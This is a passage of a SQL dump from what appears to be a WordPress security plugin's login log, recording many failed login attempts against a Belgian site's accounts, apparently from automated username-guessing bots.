(98456, 1491821336.416725, 1, 'loginFailValidUsername', 'pablo', 3, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98457, 1491821338.150584, 1, 'loginFailInvalidUsername', 'vous', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98458, 1491821339.912152, 1, 'loginFailInvalidUsername', 'training', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98459, 1491821341.828534, 1, 'loginFailInvalidUsername', 'notre', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98460, 1491821910.723298, 1, 'loginFailInvalidUsername', 'test', 0, 774888250, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98461, 1491821911.814233, 1, 'loginFailInvalidUsername', 'test', 0, 774888250, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98462, 1491822077.188188, 1, 'loginFailInvalidUsername', 'pour', 0, 1388568683, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98463, 1491822078.977389, 1, 'loginFailInvalidUsername', 'cross', 0, 1388568683, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98464, 1491822875.813636, 1, 'loginFailInvalidUsername', 'demo', 0, 2548839248, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98465, 1491823552.235033, 1, 'loginFailInvalidUsername', 'test', 0, 3319534981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(98466, 1491823553.951432, 1, 'loginFailInvalidUsername', 'test', 0, 3319534981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98467, 1491824604.094737, 1, 'loginFailInvalidUsername', 'demo', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98468, 1491824605.923741, 1, 'loginFailInvalidUsername', 'demo', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98469, 1491824607.846666, 1, 'loginFailInvalidUsername', 'demo', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98470, 1491824609.694658, 1, 'loginFailInvalidUsername', 'demo', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98471, 1491824611.644415, 1, 'loginFailInvalidUsername', 'test', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98472, 1491824613.514269, 1, 'loginFailValidUsername', 'admin', 1, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98473, 1491824615.996992, 1, 'loginFailInvalidUsername', 'test', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98474, 1491824617.844874, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98475, 1491824619.839867, 1, 'loginFailInvalidUsername', 'testuser', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98476, 1491824621.675580, 1, 'loginFailInvalidUsername', 'test123', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98477, 1491825126.876348, 1, 'loginFailInvalidUsername', 'test', 0, 656488519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98478, 1491825128.391210, 1, 'loginFailInvalidUsername', 'test', 0, 656488519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98479, 1491825439.077918, 1, 'loginFailInvalidUsername', 'test', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98480, 1491825440.814309, 1, 'loginFailValidUsername', 'admin', 1, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98481, 1491825442.538215, 1, 'loginFailValidUsername', 'julie', 2, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98482, 1491825444.273797, 1, 'loginFailValidUsername', 'pablo', 3, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98483, 1491825446.026717, 1, 'loginFailInvalidUsername', 'vous', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98484, 1491825447.751750, 1, 'loginFailInvalidUsername', 'training', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98485, 1491825449.469820, 1, 'loginFailInvalidUsername', 'notre', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98486, 1491825451.217301, 1, 'loginFailInvalidUsername', 'pour', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98487, 1491825452.938830, 1, 'loginFailInvalidUsername', 'cross', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98488, 1491825454.806080, 1, 'loginFailInvalidUsername', 'objectifs', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98489, 1491825664.827375, 1, 'loginFailInvalidUsername', 'test', 0, 1731788448, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98490, 1491825666.121135, 1, 'loginFailInvalidUsername', 'test', 0, 1731788448, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98491, 1491825730.968001, 1, 'loginFailInvalidUsername', 'test', 0, 1449385260, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98492, 1491825732.136601, 1, 'loginFailInvalidUsername', 'test', 0, 1449385260, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98493, 1491826301.630635, 1, 'loginFailInvalidUsername', 'venez', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98494, 1491826303.624160, 1, 'loginFailInvalidUsername', 'outils', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98495, 1491826305.630248, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98496, 1491826307.637916, 1, 'loginFailInvalidUsername', 'travail', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98497, 1491826309.666058, 1, 'loginFailInvalidUsername', 'namur', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98498, 1491826311.710839, 1, 'loginFailInvalidUsername', 'center', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98499, 1491826313.717253, 1, 'loginFailValidUsername', 'admin', 1, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98500, 1491826315.687472, 1, 'loginFailValidUsername', 'admin', 1, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98501, 1491826318.047085, 1, 'loginFailValidUsername', 'julie', 2, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98502, 1491826320.114698, 1, 'loginFailValidUsername', 'pablo', 3, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98503, 1491830693.622009, 1, 'loginFailInvalidUsername', 'test', 0, 45319675, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98504, 1491831456.678335, 1, 'loginFailInvalidUsername', 'test', 0, 789153653, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98505, 1491831458.468726, 1, 'loginFailInvalidUsername', 'test', 0, 789153653, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98506, 1491831774.765220, 1, 'loginFailInvalidUsername', 'test', 0, 1431082104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98507, 1491831775.922393, 1, 'loginFailInvalidUsername', 'test', 0, 1431082104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98508, 1491833443.623309, 1, 'loginFailInvalidUsername', 'test', 0, 1741554987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98509, 1491833447.713508, 1, 'loginFailInvalidUsername', 'test', 0, 1741554987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98510, 1491835582.936576, 1, 'loginFailInvalidUsername', 'test', 0, 2548244606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98511, 1491835583.988292, 1, 'loginFailInvalidUsername', 'test', 0, 2548244606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(100211, 1494828574.148057, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100212, 1494828576.138102, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100213, 1494828578.084001, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100214, 1494828580.078801, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100215, 1494828582.057281, 1, 'loginFailInvalidUsername', 'test12345', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99314, 1492882974.428163, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1000782271, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99315, 1492882975.977089, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1000782271, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99316, 1492883081.352303, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2441469703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99317, 1492883082.419045, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2441469703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99318, 1492883597.635223, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1740883504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99319, 1492883599.011265, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1740883504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99320, 1492891123.226621, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000802564, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99321, 1492891124.297533, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000802564, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99322, 1492893394.512086, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3319547138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99323, 1492893395.959794, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3319547138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99324, 1492893426.109876, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1592058074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99325, 1492893427.100081, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1592058074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99326, 1492897212.162495, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000994407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99327, 1492900113.986697, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1868429218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99328, 1492901729.939785, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631815759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99329, 1492901731.531456, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631815759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99330, 1492905634.136431, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1327441816, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99331, 1492906319.906633, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 693760773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99332, 1492906544.814160, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1660897944, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99333, 1492908954.703885, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1589624257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99334, 1492908955.878302, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1589624257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99335, 1492914914.082647, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 756559839, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99336, 1492916933.740492, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 394065135, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99337, 1492916935.252948, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 394065135, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99338, 1492917246.414143, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 462680889, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99339, 1492920440.905783, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3134378555, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99340, 1492920442.365342, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3134378555, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99341, 1492920461.764571, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1652555154, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99342, 1492923971.238268, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1075856298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99343, 1492926261.891962, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3014952872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99344, 1492926263.416846, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3014952872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99345, 1492927256.037974, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1535360117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99346, 1492927257.185518, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1535360117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99347, 1492929092.354762, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1480982105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99348, 1492929608.399710, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1464139916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99349, 1492929609.551380, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1464139916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99350, 1492929660.381832, 1, 'loginFailValidUsername', 'julie', 2, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99351, 1492929661.023656, 1, 'loginFailValidUsername', 'julie', 2, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100210, 1494828572.067239, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100209, 1494828570.082910, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100208, 1494828568.132256, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100207, 1494828352.015239, 1, 'loginFailValidUsername', 'admin', 1, 3017001352, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100206, 1494755977.339895, 1, 'loginFailInvalidUsername', 'webadmin', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100205, 1494751507.058810, 1, 'loginFailInvalidUsername', 'webadmin', 0, 778399303, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100204, 1494750687.212359, 1, 'loginFailInvalidUsername', 'testing', 0, 1427222478, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100203, 1494739097.466700, 1, 'loginFailValidUsername', 'julie', 2, 3194516422, 'Mozilla/5.0 (Windows NT 6.0; rv:52.50.07) Gecko/20148160 Firefox/52.50.07'),
(100202, 1494732578.417104, 1, 'loginFailValidUsername', 'julie', 2, 1768542757, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.61.18 (KHTML, like Gecko) Chrome/55.1.5974.0601 Safari/532.01 OPR/41.9.4251.9989'),
(100201, 1494726074.968708, 1, 'loginFailValidUsername', 'julie', 2, 703282732, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.18.60 (KHTML, like Gecko) Version/4.6.2 Safari/533.25'),
(100200, 1494719782.280928, 1, 'loginFailValidUsername', 'julie', 2, 2998565647, 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/534.06.53 (KHTML, like Gecko) Chrome/57.4.9570.4208 Safari/534.36'),
(100199, 1494713334.936608, 1, 'loginFailValidUsername', 'admin', 1, 3015568514, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100198, 1494707854.384782, 1, 'loginFailValidUsername', 'julie', 2, 2630446817, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.67.20) Gecko/20179743 Firefox/45.67.20'),
(100197, 1494702022.260101, 1, 'loginFailValidUsername', 'julie', 2, 3524283525, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.84.37 (KHTML, like Gecko) Chrome/56.3.9663.4935 Safari/534.45 OPR/44.5.0486.5658'),
(100196, 1494696184.737164, 1, 'loginFailValidUsername', 'julie', 2, 704210992, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_43_90) AppleWebKit/532.84.31 (KHTML, like Gecko) Chrome/56.3.7226.2954 Safari/533.23 Edge/37.18752'),
(100195, 1494690360.744469, 1, 'loginFailValidUsername', 'julie', 2, 635100517, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.85.38 (KHTML, like Gecko) Chrome/56.4.9703.4075 Safari/534.46 OPR/44.5.0525.5798'),
(100194, 1494684435.421126, 1, 'loginFailInvalidUsername', 'testing', 0, 3590043246, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100193, 1494683876.480671, 1, 'loginFailInvalidUsername', 'testing', 0, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100192, 1494678893.030389, 1, 'loginFailInvalidUsername', 'test1', 0, 1168365674, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100191, 1494678635.563437, 1, 'loginFailValidUsername', 'julie', 2, 1599449979, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.11.64 (KHTML, like Gecko) Version/4.6.1 Safari/533.28'),
(100190, 1494678340.650427, 1, 'loginFailInvalidUsername', 'administrator', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100189, 1494672768.362361, 1, 'loginFailValidUsername', 'julie', 2, 1565895706, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.17.60 (KHTML, like Gecko) Version/4.6.2 Safari/533.25'),
(100188, 1494666853.141493, 1, 'loginFailValidUsername', 'julie', 2, 2702591917, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.68.15 (KHTML, like Gecko) Chrome/55.1.5666.0394 Safari/532.07 OPR/41.9.4844.9571'),
(100187, 1494660793.249378, 1, 'loginFailValidUsername', 'julie', 2, 1053888074, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.50.03) Gecko/20162759 Firefox/52.50.03'),
(100186, 1494654542.901665, 1, 'loginFailValidUsername', 'julie', 2, 1988657426, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.86.34 (KHTML, like Gecko) Version/5.2.7 Safari/530.69'),
(100185, 1494648617.618271, 1, 'loginFailValidUsername', 'admin', 1, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100184, 1494648616.790860, 1, 'loginFailValidUsername', 'pablo', 3, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100183, 1494648615.959000, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100182, 1494648615.128006, 1, 'loginFailValidUsername', 'julie', 2, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100181, 1494648614.286757, 1, 'loginFailValidUsername', 'julie', 2, 3110719547, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100180, 1494635301.528715, 1, 'loginFailValidUsername', 'julie', 2, 534272049, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.12.65 (KHTML, like Gecko) Version/4.7.2 Safari/533.20'),
(100179, 1494629134.785519, 1, 'loginFailValidUsername', 'julie', 2, 1504792371, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.96.43 (KHTML, like Gecko) Version/5.3.8 Safari/531.78'),
(100178, 1494623145.173181, 1, 'loginFailValidUsername', 'julie', 2, 2957671696, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.17.54 (KHTML, like Gecko) Chrome/57.5.0529.5257 Safari/534.47'),
(100177, 1494617220.306213, 1, 'loginFailValidUsername', 'julie', 2, 2631131026, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_44_97) AppleWebKit/533.03.56 (KHTML, like Gecko) Chrome/57.5.1558.6820 Safari/530.64 Edge/34.79094'),
(100176, 1494611437.398820, 1, 'loginFailValidUsername', 'julie', 2, 3080560693, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.89.36 (KHTML, like Gecko) Version/5.2.7 Safari/530.72'),
(100175, 1494605639.285777, 1, 'loginFailValidUsername', 'julie', 2, 1600851472, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_35_88) AppleWebKit/532.84.47 (KHTML, like Gecko) Chrome/57.4.9643.4915 Safari/534.55'),
(100174, 1494603905.970381, 1, 'loginFailInvalidUsername', 'administrator', 0, 1728585030, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
